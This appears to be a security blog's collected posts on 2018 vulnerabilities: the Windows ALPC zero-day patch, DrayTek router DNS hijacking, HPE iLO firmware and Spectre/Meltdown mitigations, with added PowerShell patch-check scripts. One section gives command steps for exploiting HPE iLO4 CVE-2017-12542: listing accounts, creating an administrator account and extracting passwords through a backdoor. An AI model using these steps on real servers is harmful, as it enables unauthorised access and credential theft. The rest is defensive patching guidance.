Category: Cyber Security

Microsoft fixes the recent ALPC zero-day in time for September 2018 Patch Tuesday

Last week a security researcher known on Twitter as SandboxEscaper decided to go out with a bang by revealing a zero-day affecting Windows operating systems in a tweet, rather than submitting a bug report to Microsoft. SandboxEscaper additionally posted a link to a proof-of-concept on GitHub, just in case anyone doubted the vulnerability.

The zero-day was in turn verified by US-CERT (KB article here), and Microsoft said in a statement to The Register that it would “proactively update impacted devices as soon as possible.”

The zero-day is in the SchRpcSetSecurity function of the Windows Task Scheduler. This component (or rather the API within it) contains a vulnerability in how it handles Advanced Local Procedure Call (ALPC) requests: an authenticated local user can abuse it to overwrite the contents of a file that should be protected by filesystem ACLs, which in turn can be leveraged to gain SYSTEM privileges. The vulnerability was quickly incorporated into an ongoing malware distribution campaign by the cyber-criminal group known as PowerPool.

Now let’s get to today: Microsoft has released its September instalment of patches, and this batch contains 62 important fixes, the most notable being the ALPC zero-day, tracked as CVE-2018-8440.

It is important to note that this vulnerability is being actively exploited and there is no “official” mitigation, so the only Microsoft-approved fix is to apply the patch as soon as possible. If you want the direct download links or links to the relevant KB articles, please find them below.





Product | KB article (update type)
Windows 10 for 32-bit Systems | 4457132 (Security Update)
Windows 10 for x64-based Systems | 4457132 (Security Update)
Windows 10 Version 1607 for 32-bit Systems | 4457131 (Security Update)
Windows 10 Version 1607 for x64-based Systems | 4457131 (Security Update)
Windows 10 Version 1703 for 32-bit Systems | 4457138 (Security Update)
Windows 10 Version 1703 for x64-based Systems | 4457138 (Security Update)
Windows 10 Version 1709 for 32-bit Systems | 4457142 (Security Update)
Windows 10 Version 1709 for x64-based Systems | 4457142 (Security Update)
Windows 10 Version 1803 for 32-bit Systems | 4457128 (Security Update)
Windows 10 Version 1803 for x64-based Systems | 4457128 (Security Update)
Windows 7 for 32-bit Systems Service Pack 1 | 4457144 (Monthly Rollup), 4457145 (Security Only)
Windows 7 for x64-based Systems Service Pack 1 | 4457144 (Monthly Rollup), 4457145 (Security Only)
Windows 8.1 for 32-bit systems | 4457129 (Monthly Rollup), 4457143 (Security Only)
Windows 8.1 for x64-based systems | 4457129 (Monthly Rollup), 4457143 (Security Only)
Windows RT 8.1 | 4457129 (Monthly Rollup)
Windows Server 2008 for 32-bit Systems Service Pack 2 | 4458010 (Monthly Rollup), 4457984 (Security Only)
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) | 4458010 (Monthly Rollup), 4457984 (Security Only)
Windows Server 2008 for Itanium-Based Systems Service Pack 2 | 4458010 (Monthly Rollup), 4457984 (Security Only)
Windows Server 2008 for x64-based Systems Service Pack 2 | 4458010 (Monthly Rollup), 4457984 (Security Only)
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) | 4458010 (Monthly Rollup), 4457984 (Security Only)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 | 4457144 (Monthly Rollup), 4457145 (Security Only)
Windows Server 2008 R2 for x64-based Systems Service Pack 1 | 4457144 (Monthly Rollup), 4457145 (Security Only)
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) | 4457144 (Monthly Rollup), 4457145 (Security Only)
Windows Server 2012 | 4457135 (Monthly Rollup), 4457140 (Security Only)
Windows Server 2012 (Server Core installation) | 4457135 (Monthly Rollup), 4457140 (Security Only)
Windows Server 2012 R2 | 4457129 (Monthly Rollup), 4457143 (Security Only)
Windows Server 2012 R2 (Server Core installation) | 4457129 (Monthly Rollup), 4457143 (Security Only)
Windows Server 2016 | 4457131 (Security Update)
Windows Server 2016 (Server Core installation) | 4457131 (Security Update)
Windows Server, version 1709 (Server Core Installation) | 4457142 (Security Update)
Windows Server, version 1803 (Server Core Installation) | 4457128 (Security Update)
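Added here as a worked check, not code from the original post: a PowerShell function that reads the local build number, looks up the September 2018 package(s) for it using the KB numbers from the table above, and reports whether one is installed. The build-to-KB map comes from the table; the minimum Windows 10 revision numbers used as a fallback (because later cumulative updates supersede the September one) are an assumption taken from the KB article titles and should be verified against the KB pages before you rely on them.

```powershell
# Added example (not code from the original post): report whether the
# September 2018 package that fixes CVE-2018-8440 is present on the local
# machine, keyed on the KB numbers in the table above. Run it elevated.

# Build number -> KB package(s) from the table above (where a build has both
# a Monthly Rollup and a Security Only package, either one carries the fix).
$FixByBuild = @{
    '10240' = @('KB4457132')               # Windows 10 RTM
    '14393' = @('KB4457131')               # Windows 10 1607 / Windows Server 2016
    '15063' = @('KB4457138')               # Windows 10 1703
    '16299' = @('KB4457142')               # Windows 10 1709 / Windows Server 1709
    '17134' = @('KB4457128')               # Windows 10 1803 / Windows Server 1803
    '7601'  = @('KB4457144', 'KB4457145')  # Windows 7 SP1 / Windows Server 2008 R2 SP1
    '9200'  = @('KB4457135', 'KB4457140')  # Windows Server 2012
    '9600'  = @('KB4457129', 'KB4457143')  # Windows 8.1 / Windows Server 2012 R2
    '6002'  = @('KB4458010', 'KB4457984')  # Windows Server 2008 SP2
    '6003'  = @('KB4458010', 'KB4457984')  # Windows Server 2008 SP2 with the newer servicing stack
}

# Windows 10 cumulative updates supersede each other, so once a later month's
# package is installed the September KB no longer appears in Get-HotFix. For
# those builds also accept an OS revision (UBR) at or above the one the
# September package installs. ASSUMPTION: these revisions are taken from the
# KB article titles (e.g. "OS Build 17134.285"); confirm them against the KB
# pages before relying on this check.
$MinUbrByBuild = @{
    '10240' = 17976; '14393' = 2485; '15063' = 1324; '16299' = 665; '17134' = 285
}

function Test-Cve20188440Fix {
    [CmdletBinding()]
    param()

    $cv    = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [string]$cv.CurrentBuildNumber   # e.g. '17134'
    $ubr   = [int]$cv.UBR                     # value absent before Windows 10 -> 0
    $kbs   = $FixByBuild[$build]

    if (-not $kbs) {
        return [pscustomobject]@{
            Build = $build; UBR = $ubr; Patched = $null; InstalledKB = $null
            Detail = 'Build not in the September 2018 table; check the KB article manually'
        }
    }

    # Get-HotFix reads Win32_QuickFixEngineering; an ID that is not installed
    # only produces a non-terminating error, which is suppressed here.
    $hit    = Get-HotFix -Id $kbs -ErrorAction SilentlyContinue | Select-Object -First 1
    $minUbr = $MinUbrByBuild[$build]
    $byUbr  = ($null -ne $minUbr) -and ($ubr -ge $minUbr)

    [pscustomobject]@{
        Build       = $build
        UBR         = $ubr
        Patched     = ($null -ne $hit) -or $byUbr
        InstalledKB = $(if ($hit) { $hit.HotFixID } else { $null })
        Detail      = $(if ($hit)       { "Package $($hit.HotFixID) installed on $($hit.InstalledOn)" }
                        elseif ($byUbr) { "Revision ${build}.${ubr} is at or above the September 2018 level ${build}.${minUbr}" }
                        else            { "Missing; expected one of: $($kbs -join ', ')" })
    }
}

# Returns an object rather than text, so it can be collected from many hosts
# with Invoke-Command and filtered on Patched -ne $true.
Test-Cve20188440Fix | Format-List
```

A Patched value of $null means the build was not in the September table (for example a newer or unsupported release) and needs a manual look at the KB article rather than being treated as patched or unpatched.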
HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

This shows just a few notes for exploiting CVE-2017-12542. I am currently looking at various RCEs and backdoors available for different iLO versions and will hopefully do more articles soon.

How to list user accounts on HPE iLO 4
If you just need to list user accounts on the HPE iLO, you can use the following Python script (//) or Metasploit module (//):

$ git clone //
$ cd CVE-2017-12542
$ python -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

How to create a new user on HPE iLO 4
Should you want to create a new account on the HPE iLO, you can use the same script as above (//) or the Metasploit module (//):

$ git clone //
$ cd CVE-2017-12542
$ python -u newadmin -p newadmin x.x.x.x

RCE on the HPE iLO
The backdoor can be located at //. Following HPE’s advisory, all iLO 4 firmware versions prior to 2.53 are affected, so if you are running an old version in a corporate environment please consider upgrading the firmware; the current release, 2.60 (30 May 2018), can be obtained directly from HPE via this link.

Steps on how to get command execution on HP iLO and extract passwords (check the running firmware version first; the xmldata document is served without authentication):

$ git clone //
$ curl -s -k https://x.x.x.x/xmldata?item=all | grep -i "<FWRI>"
$ wget //
$ chmod 755 CP032487.scexe
$ ./CP032487.scexe --unpack=/tmp/iLO
$ cd ilo4_toolbox/scripts/iLO4/
$ ./ ilo4_253.bin
$ python x.x.x.x
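The curl step above only greps the firmware string out of the unauthenticated xmldata document. The following PowerShell, added here and not part of the original post or the ilo4_toolbox project, does the same fetch and compares the result against the 2.53 threshold from HPE’s advisory, which is the check you want to run across an estate before deciding where to upgrade. The sample XML is constructed (not captured from a real device), and the target address is whatever iLO you are authorised to test.

```powershell
# Added example, not code from the original post or from the ilo4_toolbox
# project: fetch the unauthenticated /xmldata?item=all document an iLO serves
# and flag iLO 4 firmware older than 2.53, the first fixed version according
# to HPE's advisory for CVE-2017-12542. Parsing is kept separate from the
# HTTP fetch so it can be checked offline against the constructed sample.

function ConvertFrom-IloXmlData {
    param([Parameter(Mandatory)][string]$Xml)

    [xml]$doc = $Xml
    $mp = $doc.RIMP.MP                     # management-processor block
    [pscustomobject]@{
        Product  = [string]$mp.PN          # e.g. 'Integrated Lights-Out 4 (iLO 4)'
        Firmware = [version]$mp.FWRI       # FWRI is the firmware revision, e.g. 2.50
        Serial   = [string]$mp.SN
    }
}

function Test-IloCve201712542 {
    param([Parameter(Mandatory)]$Info)

    # HPE: iLO 4 firmware prior to 2.53 is affected. Other generations are
    # outside the scope of this advisory and are reported as not vulnerable.
    $isIlo4 = $Info.Product -match 'iLO 4'
    [pscustomobject]@{
        Product    = $Info.Product
        Firmware   = $Info.Firmware.ToString()
        Vulnerable = [bool]($isIlo4 -and ($Info.Firmware -lt [version]'2.53'))
    }
}

function Get-IloInfo {
    param([Parameter(Mandatory)][string]$Target)

    # xmldata is served without authentication; the iLO certificate is usually
    # self-signed, so validation is skipped for this call.
    $uri = "https://$Target/xmldata?item=all"
    if ((Get-Command Invoke-WebRequest).Parameters.ContainsKey('SkipCertificateCheck')) {
        $resp = Invoke-WebRequest -Uri $uri -SkipCertificateCheck -TimeoutSec 10     # PowerShell 7+
    } else {
        # Windows PowerShell 5.1: allow the older TLS versions old iLO firmware
        # speaks and relax certificate validation for this session.
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]'Tls,Tls11,Tls12'
        [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $resp = Invoke-WebRequest -Uri $uri -UseBasicParsing -TimeoutSec 10
    }
    ConvertFrom-IloXmlData -Xml $resp.Content
}

# Constructed sample of the xmldata response (not captured from a real device).
$SampleXml = @'
<?xml version="1.0"?>
<RIMP>
  <HSI><SBSN>CZ00000000</SBSN><SPN>ProLiant DL380 Gen9</SPN></HSI>
  <MP>
    <ST>1</ST>
    <PN>Integrated Lights-Out 4 (iLO 4)</PN>
    <FWRI>2.50</FWRI>
    <BBLK></BBLK>
    <HWRI>ASIC: 16</HWRI>
    <SN>ILOCZ00000000</SN>
    <UUID>ILOCZ00000000</UUID>
    <SSO>0</SSO>
  </MP>
</RIMP>
'@

# Offline check against the sample (2.50 is below 2.53, so it is flagged).
Test-IloCve201712542 -Info (ConvertFrom-IloXmlData -Xml $SampleXml)

# Live check against a device you are authorised to test:
# Test-IloCve201712542 -Info (Get-IloInfo -Target 'x.x.x.x')
```

The version comparison uses [version] rather than string comparison so that 2.60 is correctly treated as newer than 2.53; if a device reports a firmware string the cast cannot parse, the error is the signal to look at that host by hand rather than silently marking it safe.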



DrayTek Routers suffering a zero-day attack in the wild!

DrayTek is a manufacturer of broadband CPE (Customer Premises Equipment), including firewalls, VPN devices, routers and wireless LAN devices. On Friday it was announced that attackers have been exploiting a zero-day vulnerability to change the DNS settings on some DrayTek routers. Initially, several users reported finding that their DNS server settings had been changed to an unknown server with the address of and the secondary set to Google’s public DNS server.

After users were chasing Draytek for a response the company eventually responded.

DrayTek issued a security advisory on its UK site and another on its international site. The UK advisory covers checking your router’s settings to see if you are affected; the international advisory lists all affected devices and promises that firmware resolving the vulnerability is either already available or will be available imminently. The list below covers the affected devices and the firmware version required to resolve the zero-day:

Vigor120, version

Vigor122, version

Vigor130, version

VigorNIC 132, version

Vigor2120 Series, version

Vigor2132, version

Vigor2133, version

Vigor2760D, version

Vigor2762, version

Vigor2832, version

Vigor2860, version 3.8.8

Vigor2862, version

Vigor2862B, version

Vigor2912, version

Vigor2925, version

Vigor2926, version

Vigor2952, version

Vigor3220, version

VigorBX2000, version

VigorIPPBX2820, version

VigorIPPBX3510, version

Vigor2830nv2, version

Vigor2820, version

Vigor2710, version

Vigor2110, version

Vigor2830sb, version

Vigor2850, version

Vigor2920, version

Initially many speculated that this was down to users leaving default credentials in place. However, through collaboration within the tech community it was verified that some of the affected devices were not using default credentials, and that when the DNS settings were changed no syslog entries revealed by what method or account the change was made. This points to a flaw in DrayTek’s own code, and explains why it can only be resolved by upgrading the firmware.

Using the internet search engine Shodan I can see that there are currently 802,389 DrayTek devices reachable from the internet (some of these may already be patched). My point in using this figure is that, even though DrayTek is a Taiwanese company, most of the publicly reachable devices are located in the United Kingdom and the Netherlands.


So why would a hacker want to change your DNS server?

By changing your DNS provider to a server they control, an attacker can redirect you to a clone of the website you intended to visit, for example the Office 365 login screen. When you enter your login details there they capture them and forward you on to the legitimate site, so you would not necessarily realise anything had happened; by then it is too late and they already have your credentials. This serves as a crucial reminder to use two-factor authentication (2FA) wherever possible, so that even if an attacker obtains your password they cannot simply log in with it.

HPE iLO Firmware Download Links

**Updated 23/07/2018**


Using the links below you can download the recent HPE iLO (Integrated Lights-Out) firmware files (to get to the .bin file you will need to extract the .exe with 7-Zip and then install it via the iLO web page, or run the .exe on the server itself); these are all I could find on HPE’s website:

  1. iLO1 Latest : ilo196.bin (30-Apr-2014)
  2. iLO2 Latest : ilo2_232.bin (18-Feb-2018)
  3. iLO3 Latest : ilo3_189.bin (07-Jul-2017)
  4. iLO4 Latest :  ilo4_260.bin (23-May-2018)
  5. iLO5 Latest :  ilo5_130.bin (4-Jun-2018)


An Easy Guide For How To Mitigate Spectre And Meltdown

Are you stuck trying to understand how to protect your devices or company against Spectre and Meltdown? Well you are unfortunately not alone. This article should help clear it up though.

Ever since the two vulnerabilities nicknamed Spectre and Meltdown, affecting CPUs dating back to 1995, became public a few weeks ago, vendors have been rushing to release patches and updates to mitigate them.

This initial flood of patches has not been smooth: there have been a lot of incompatibility issues and plenty of finger-pointing and frustration. To help clear up some misconceptions, I’ve put together the following guide, which walks through the major updates to operating systems and browsers, explaining how they address Meltdown and/or Spectre, what they specifically don’t address, and any known compatibility or performance issues that have been reported.

Meltdown and Spectre – What are they?

Before we dive in, here’s a quick explanation of what Meltdown and Spectre are all about.

Meltdown (CVE-2017-5754)

Meltdown is a CPU vulnerability that allows a user-mode program to read privileged kernel-mode memory. It affects all out-of-order-execution Intel processors released since 1995, with Itanium and pre-2013 Atoms being the only exceptions. A list of vulnerable ARM processors and their mitigations is here. No AMD processors are affected by Meltdown.

Out of the two vulnerabilities, Meltdown is the easier one to fix, and can most commonly be addressed by applying an Operating System update.

Spectre (CVE-2017-5753, CVE-2017-5715)

Spectre is better thought of as a whole new class of attack rather than a single vulnerability. It is enabled by the unintended side effects of speculative execution, the technique processors use to achieve higher speeds: they predict which instructions will be needed next and start executing them, so that when the result is actually requested it is already available, or at least under way.

There are two variants of Spectre: the first (bounds check bypass, CVE-2017-5753) and the second (branch target injection, CVE-2017-5715). Both can allow an attacker to extract information from other running processes (for example, stealing login cookies from a web browser).

AMD, ARM and Intel processors have all been reported vulnerable to Spectre to varying degrees, and this poses significant patching problems. While operating system and browser updates help mitigate the risk of Spectre to some degree, many experts agree the only true fix is new hardware. As such, Spectre is likely to remain an issue for many years to come.

Source: SANS / Rendition Infosec. See the full presentation here

It’s important to note that both vulnerabilities are information-disclosure issues. Neither allows code execution on its own: an attacker must already be running code on the machine (which, for Spectre, can be JavaScript in a browser) and uses the flaw to read memory, not to run malware.


Operating System updates

Windows updates

Microsoft’s process for its security update addressing Meltdown and Spectre has been a bit of a roller-coaster, tainted by incompatibility issues with antivirus software and AMD processors. For some scenarios, deployment of the 2018-01 security update has had to be put on hold or restricted altogether.

More details and direct download links to the updates below:

  • Windows 10
  • Windows 8 and Windows Server 2012
  • Windows 7 and Windows Server 2008

What the Microsoft Patches address:

  • Spectre variant 1, bounds check bypass (CVE-2017-5753)
  • Meltdown, rogue data cache load (CVE-2017-5754)

The original security update did not provide the Meltdown mitigation for 32-bit (x86) versions of Windows.
Microsoft’s advisory regarding 32-bit: “The 32 bit update packages listed in this advisory fully addressed CVE-2017-5753 and CVE-2017-5715, but did not provide protections for CVE-2017-5754 at this time.” Microsoft continued to work with the affected chip manufacturers and has since released an additional security update, KB4073291, to mitigate CVE-2017-5754 on 32-bit systems.

What they don’t address:

  • Spectre variant 2, branch target injection (CVE-2017-5715), only partially: at present firmware (microcode) updates are also required to fully address variant 2.

Known issues:

  • Antivirus compatibility: Microsoft only offers the January 2018 security update to devices on which the installed antivirus has declared itself compatible by setting the following registry value:

    Key: HKEY_LOCAL_MACHINE
    Subkey: SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat
    Value: cadca5fe-87d3-4b96-b7fb-a231484277cc
    Type: REG_DWORD
    Data: 0x00000000

This resulted in a lot of initial confusion in the sector, with the antivirus companies all providing different updates, or some just going silent, which did not help; some set the registry key for their customers while others asked users to set it themselves. The situation only gets more complicated considering many organisations have more than one antivirus solution to maintain.

Should you use one of Microsoft’s own solutions; Microsoft clarified that Windows Defender Antivirus, System Center Endpoint Protection, and Microsoft Security Essentials are all compatible with the update and that they do set the registry key.

This means that if you have one of those built-in Microsoft protections enabled, the registry key should be set automatically and no further manual action should be necessary. If you use a third-party antivirus, one of two things happens. If Microsoft officially recognises the product, Windows Defender and Microsoft Security Essentials are turned off, so your third-party antivirus will need the compatible update from its vendor before the key is set. If Microsoft does not recognise your antivirus, Windows Defender or Microsoft Security Essentials will still set the registry key even though your third-party product may not support the update, which could mean blue-screen issues.

Kevin Beaumont has created a spreadsheet to keep track of the antivirus vendors and whether they make this key: //


To manually add the registry key and obtain the update now you can enter the following into a command prompt window (as admin) and then run Windows Update ( does not accept any liability for any issues that could arise as a result and would recommend you contact Microsoft and your AV provider prior to doing this): 

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" /v "cadca5fe-87d3-4b96-b7fb-a231484277cc" /t REG_DWORD /d "0x00000000" /f
  • AMD compatibility issues: as first reported by The Verge, Microsoft received numerous reports of PCs with AMD processors getting into a boot loop after installing the latest Windows security update. After investigation the company confirmed the issue and temporarily stopped delivering the update to AMD devices. If you are affected you will need to visit Microsoft’s support site for details on getting your machine(s) back up and running. Microsoft announced on 18 January that it would resume rolling out patches for AMD devices running Windows 7 SP1 and Windows Server 2008 R2 SP1, Windows 8.1 and Windows Server 2012 R2, and the latest version of Windows 10, 1709. Updates for the older Windows 10 versions 1511, 1607 and 1703 are still on hold, as are updates for Windows Server 2016 and Windows 10 Enterprise.
  • Group or MDM policy configurations may be disabling updates: According to Microsoft, if you have Group or MDM policy settings configured to disable preview builds, your machines may not be receiving updates (see what those settings are here). To fix that, Microsoft recommends temporarily changing Group/MDM policy settings to “Not Configured” and changing them back once the updates have been installed.
  • Performance implications: as with the other operating systems, the patches addressing Meltdown and Spectre are expected to have a varied but mostly minor impact on performance. In a blog post, Microsoft Executive VP Terry Myerson explained that the impact varies with factors such as the version of Windows and the age of the machine:
    • Windows 10 on circa-2016 PCs with Skylake, Kaby Lake or newer CPUs: single-digit slowdowns, which most users shouldn’t notice.
    • Windows 10 on circa-2015 PCs with Haswell or older CPUs: the slowdown can be more noticeable, and some users may notice a decrease in performance.
    • Windows 8 or Windows 7 on circa-2015 PCs with Haswell or older CPUs: most users will likely notice a decrease in performance.
    • Windows Server (any CPU): mitigations to isolate code within a Windows Server instance have a more significant performance impact, but as above it very much depends on the workload and the age of the hardware. According to Myerson, “This is why you want to be careful to evaluate the risk of untrusted code for each Windows Server instance, and balance the security versus performance trade-off for your environment.”

Enabling protections for Windows Server

Microsoft has also advised Windows Server customers that they need to take the additional step of adding the following registry values, because on Windows Server the mitigations are disabled by default for performance reasons.

To enable the fix:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 0 /f 

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f 

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization" /v MinVmVersionForCpuBasedMitigations /t REG_SZ /d "1.0" /f


If this is a Microsoft Hyper-V host and the firmware updates have been applied, you will need to fully shut down all virtual machines: the mitigation does not take effect in a VM until its next boot. When you restart the host, shut down all VMs first and then restart the host; do not “Save” or “Pause” a VM across the reboot, since the VM has to boot from scratch for the mitigation to take effect.

To disable this fix:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f 

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f


Again you will need to fully restart the Hyper-V host and Virtual Machines for this change to take effect. (Note there is not any requirement to change MinVmVersionForCpuBasedMitigations to disable the mitigations.)

Microsoft also notes that for Hyper-V hosts, live migration between patched and un-patched hosts may fail. The company also points to an alternative protection mechanism you can use on hosts that don’t have updated firmware yet.

Additional guidance from Microsoft:

Verifying new Windows protections are enabled:

To help confirm whether updates have been implemented correctly Microsoft has provided a PowerShell script that system administrators can run to test Meltdown and Spectre mitigations.

The following command will install the PowerShell module:

PS > Install-Module SpeculationControl

Note: there are a couple of requirements for running this command. First, you’ll need to run PowerShell with admin privileges and may need to adjust the execution policy. Also, Install-Module was introduced in PowerShell 5.0; most Windows 7 machines will not have this version, since the upgrade is optional and unrelated to security. A device with an older PowerShell can still run the Get-SpeculationControlSettings function, but only if you obtain the contents of the script and run it ad hoc.

Once installed, the following command will run the test to check your system:

PS > Get-SpeculationControlSettings

The output will look something like this:

Results for Spectre protections

The first group, “Speculation control settings for CVE-2017-5715 [branch target injection]”, refers to the protections in place for Spectre variant 2. If the value of “Windows OS support for branch target injection mitigation is present” is True, the Windows security update has been installed successfully.

The other red text in that section confirms that the more complete mitigation for variant 2 requires firmware updates, which Intel says it is in the process of rolling out. According to the company, updates for more than 90 percent of its processor products should be available by the end of next week.

Results for Meltdown protections

The second group – “Speculation control settings for CVE-2017-5754 [rogue data cache load] – refers to the protections in place for the Meltdown vulnerability. If you see the following results and no red lines then you’ve confirmed the Windows Security update has been successfully implemented and the machine is protected:

Hardware requires kernel VA shadowing: True
Windows OS support for kernel VA shadow is present: True
Windows OS support for kernel VA shadow is enabled: True
Windows OS support for PCID optimization is enabled: True

Test results confirming successful mitigation of the Meltdown vulnerability

If you see any red lines in this section then that means the update has not been successfully applied. For more details on interpreting the PowerShell script output, Microsoft has a full results key here.
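The three Windows checks this guide asks for (the QualityCompat value under the antivirus known issue, the Windows Server FeatureSettingsOverride values, and the SpeculationControl output) are usually done by hand with reg add and a console read. As an added example, not Microsoft’s script and not code from the original post, the PowerShell below gathers all three into one object per host and can optionally write the two registry settings; the -SetQualityCompat switch is only appropriate once your antivirus vendor has confirmed compatibility, for the same reason the manual reg add above carries a warning. Field names on the SpeculationControl object (BTI* and KVAShadow*) are the ones the module exposes.

```powershell
# Added example, not Microsoft's script and not code from the original post:
# one function that reports the three items this guide asks you to verify on
# a Windows host, and can set the first two. Run it elevated.
#   1. the QualityCompat value an antivirus vendor sets to declare
#      compatibility, without which the January 2018 update is not offered;
#   2. the Windows Server FeatureSettingsOverride / FeatureSettingsOverrideMask
#      values (0 / 3 = mitigations on, 3 / 3 = off, as in the reg commands above);
#   3. the SpeculationControl module's result, if the module is installed.

$QualityCompatKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat'
$QualityCompatVal = 'cadca5fe-87d3-4b96-b7fb-a231484277cc'
$MemMgmtKey       = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management'
$VirtKey          = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization'

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # $null when the key or value is absent, instead of an error.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    $item.$Name
}

function Set-RegValue {
    param([string]$Path, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -PropertyType $Type -Value $Value -Force | Out-Null
}

function Get-SpectreMeltdownState {
    [CmdletBinding()]
    param(
        # Only after confirming with your AV vendor that the product is compatible.
        [switch]$SetQualityCompat,
        # Write the Windows Server values that turn the mitigations on.
        [switch]$EnableServerMitigations
    )

    if ($SetQualityCompat) { Set-RegValue $QualityCompatKey $QualityCompatVal 0 }
    if ($EnableServerMitigations) {
        Set-RegValue $MemMgmtKey 'FeatureSettingsOverride'     0
        Set-RegValue $MemMgmtKey 'FeatureSettingsOverrideMask' 3
        Set-RegValue $VirtKey 'MinVmVersionForCpuBasedMitigations' '1.0' -Type String   # Hyper-V hosts
    }

    $override = Get-RegValue $MemMgmtKey 'FeatureSettingsOverride'
    $mask     = Get-RegValue $MemMgmtKey 'FeatureSettingsOverrideMask'
    $isServer = (Get-CimInstance Win32_OperatingSystem).ProductType -ne 1   # 1 = workstation

    $state = [ordered]@{
        QualityCompatSet            = $null -ne (Get-RegValue $QualityCompatKey $QualityCompatVal)
        IsServer                    = $isServer
        FeatureSettingsOverride     = $override
        FeatureSettingsOverrideMask = $mask
        # Client SKUs enable the mitigations by default; Server needs 0 / 3.
        ServerMitigationsEnabled    = $(if (-not $isServer) { $null } else { ($override -eq 0) -and ($mask -eq 3) })
    }

    # SpeculationControl (Install-Module SpeculationControl) returns an object
    # whose BTI* fields cover Spectre variant 2 and KVAShadow* fields Meltdown;
    # it also writes its own coloured report to the host.
    if (Get-Command Get-SpeculationControlSettings -ErrorAction SilentlyContinue) {
        $sc = Get-SpeculationControlSettings
        $state['SpectreV2OsSupportPresent'] = $sc.BTIWindowsSupportPresent   # True once the OS update is on
        $state['SpectreV2Enabled']          = $sc.BTIWindowsSupportEnabled
        $state['SpectreV2HardwarePresent']  = $sc.BTIHardwarePresent         # needs firmware / microcode
        $state['MeltdownKvaShadowRequired'] = $sc.KVAShadowRequired          # False on CPUs not affected
        $state['MeltdownEnabled']           = $sc.KVAShadowWindowsSupportEnabled
        $state['MeltdownMitigated']         = (-not $sc.KVAShadowRequired) -or $sc.KVAShadowWindowsSupportEnabled
    } else {
        $state['SpeculationControlModule']  = 'not installed; run Install-Module SpeculationControl'
    }

    [pscustomobject]$state
}

Get-SpectreMeltdownState | Format-List
```

Because it returns an object, the same function can be pushed to a fleet with Invoke-Command and the results filtered on SpectreV2HardwarePresent (which stays False until firmware arrives) and MeltdownMitigated, which mirrors the “no red lines” reading of the second group above. Remember that changing the Server values only takes effect after a reboot, and on a Hyper-V host after the VMs have been fully shut down and restarted as described above.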

MacOS and iOS updates

Apple included mitigations to address Meltdown in its macOS 10.13.2 and iOS 11.2 updates released in December. They have since followed up with additional mitigations addressing the Spectre vulnerability with the recently released macOS High Sierra 10.13.2 Supplemental Update and iOS 11.2.2 update.

What they address:

  • Meltdown (CVE-2017-5754)
  • Spectre (CVE-2017-5753 and CVE-2017-5715) to some extent

What they don’t address:

  • Spectre (CVE-2017-5753 and CVE-2017-5715), only partially
    Apple says its latest updates to macOS, iOS and Safari help mitigate the risk of Spectre being exploited, but acknowledges it will continue to develop and test further mitigations.

No reported issues



Browser updates

Security researchers have been advising that the most likely route to exploiting Spectre is a web-based attack using JavaScript (for example in a malicious ad) to leak information, session keys and the like held in the browser’s memory. Given this, Google, Mozilla, Apple and Microsoft have all either issued or scheduled browser updates to reduce that risk.

What browser updates address:

  • Spectre (CVE-2017-5753 and CVE-2017-5715) to some extent

What browser updates don’t address:

  • Meltdown (CVE-2017-5754)
    You will still need to apply Operating System updates to mitigate Meltdown.


Google has announced it will be including the mitigations for Spectre starting with Chrome 64, which will be released on or around January 23. For the time being, Chrome users are advised to enable site isolation, which can help prevent the possibility of one site stealing data from another site.


Mozilla has already issued Firefox 57.0.4, which helps address Spectre by reducing the precision of Firefox’s internal timer functions and disabling the SharedArrayBuffer feature. Firefox does not have an equivalent of Chrome’s site isolation at this point, so those timer and SharedArrayBuffer changes are the mitigation available to Firefox users.


Apple has released Safari 11.0.2 to specifically mitigate the effects of Spectre.

IE and Edge

Microsoft has made changes to both Internet Explorer 11 and Microsoft Edge to mitigate Spectre. In addition to removing support for SharedArrayBuffer from Edge, it has made changes to reduce the precision of several time sources to make successful attacks more difficult.


Firmware updates

Operating system and browser updates only partially mitigate Meltdown and Spectre; UEFI firmware and BIOS updates carrying new CPU microcode are also required. If and when those updates are pushed out varies from vendor to vendor, adding yet another layer of complexity, uncertainty and frustration to patching. In practice you may only obtain them by proactively checking your PC and server manufacturers’ support sites periodically over the coming days or weeks.


Intel has released new Linux Processor microcode data files that can be used to add Meltdown and Spectre mitigations without having to perform a BIOS update.

Intel promised firmware updates for 90 percent of the affected processors made in the past five years by the 15th January. So far, it looks as though they are on-track and it now is resting on the downstream vendors/distributors to complete testing and deployment to their respective customer bases of-which these microcode fixes apply to a specific list of processors provided here.

